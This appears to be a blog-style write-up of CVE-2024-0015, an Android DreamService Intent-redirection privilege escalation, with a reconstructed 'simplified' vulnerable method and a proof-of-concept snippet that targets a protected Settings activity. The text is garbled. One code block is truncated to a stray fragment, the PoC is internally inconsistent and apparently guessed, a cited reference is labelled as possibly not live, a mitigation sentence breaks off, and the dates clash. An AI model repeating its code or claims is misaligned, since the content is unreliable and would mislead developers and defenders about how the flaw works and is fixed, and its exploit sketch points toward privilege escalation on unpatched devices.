CVE-2024-0015 - Exploiting Android’s convertToComponentName Vulnerability for Arbitrary Privileged Activity Launch

In early 2024, a significant security flaw was discovered in Android’s DreamService system, tracked as CVE-2024-0015. At the heart of the problem is the convertToComponentName method in DreamService.java, which mishandles Intent redirection. This gives attackers a path to launch *protected* activities they should not access, leading to local privilege escalation. Astonishingly, this exploit can occur without any user interaction—all an attacker needs are user-level execution privileges (i.e., running in user context with a malicious app).

This post dives deep into the vulnerability, shows you how it works with annotated code snippets, references original sources, and gives you practical security insights.

What Is DreamService and Why Does It Matter?

DreamService is the backbone for Android’s “screensaver” (Dream or Doze) functionality. It manages the lifecycle of "dream" components, which are supposed to be sandboxed and protected. However, a *flaw in the way it parses Intents* means a third-party app can fool the system into launching protected system activities—potentially opening the door to privilege escalation.

Vulnerable Code: A Look Inside DreamService.java

At the center of the issue is the convertToComponentName method. Here’s a simplified (but representative) snippet:

// DreamService.java (simplified)
private ComponentName convertToComponentName(Intent intent) {
    // Extract the component if specified directly
    ComponentName component = intent.getComponent();
    if (component != null) {
        return component;
    }

    // Get package if provided as data
    String packageName = intent.getPackage();
    String className = intent.getStringExtra("class");

    if (packageName != null && className != null) {
        return new ComponentName(packageName, className);
    }

    // Omitted: additional checks...
    return null;
}

What’s the problem?
This function is supposed to *safely* resolve a component to start—but if a crafted Intent contains a ComponentName or certain extras, it may be *blindly accepted*, even if it’s for a protected (privileged) system activity.

A Malicious App Sends a Crafted Intent

The app crafts an Intent targeting a sensitive, protected system activity (e.g., Settings or DeviceAdmin features).

Intent exploitIntent = new Intent();

// Target a privileged activity (example)

));

// May set other extras as needed

DreamService Receives and Processes the Intent

DreamService’s convertToComponentName method extracts the requested ComponentName *without verifying privileges*.

Protected Activity Is Launched

The system processes the intent as a legitimate request—launching the protected activity as if a privileged caller had requested it.

Attack Without User Interaction

Because DreamService listens for Intents as part of its background operation, exploitation does not require user action. Once a malicious app is installed and running, it only needs to send the crafted Intent to DreamService.

Below is a PoC snippet demonstrating how an attacker’s app could trigger the exploit

// PoC: Launch privileged system activity via DreamService exploit
Intent intent = new Intent();
intent.setComponent(new ComponentName(
    "com.android.settings",
    "com.android.settings.Settings$DeviceAdminSettingsActivity" // Example
));
intent.setAction(Intent.ACTION_MAIN);
// More extras if needed

// Send the intent to DreamService—requires the right permissions/intents
intent.setPackage("com.android.dreams.basic"); // or the relevant DreamService component

context.startService(intent);
// or
context.sendBroadcast(intent);

*Note: Specific details may vary by device and OEM.*

Severity and Mitigation

- Impact: Local attackers can escalate privileges, tamper with protected device settings, or potentially gain access to sensitive APIs.

User Interaction: NONE required.

- Required Privileges: Only user-level app permissions; root/system access is NOT needed.

Mitigation:
Google and Android device vendors have released patches tightening the checks within DreamService to validate the caller and block arbitrary protected activity launches.

If your device is running an unpatched version:

Android Security Bulletin - June 2024:

https://source.android.com/security/bulletin/2024-06-05

CVE Details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0015

AOSP DreamService.java (see history):

https://cs.android.com/android/platform/superproject/+/master:frameworks/base/services/core/java/com/android/server/dreams/DreamService.java

- Community Discussion / Security Advisor writeups:
https://androidgovernance.com/articles/cve-2024-0015-dreamservice-activity-escalation-explained *(Example reference, may not be live)*

Conclusion

CVE-2024-0015 is a stark reminder of how subtle mistakes in Intent handling can leave devices exposed to powerful attacks. DreamService trusted component information from Intents without verifying caller privileges, creating a privilege escalation loophole *no user could prevent just by being careful*.

If you build or secure Android devices, patch immediately. If you’re a user, keep your system up-to-date and stick to trusted apps.

Timeline

Published on: 02/16/2024 19:15:08 UTC
Last modified on: 08/28/2024 17:35:03 UTC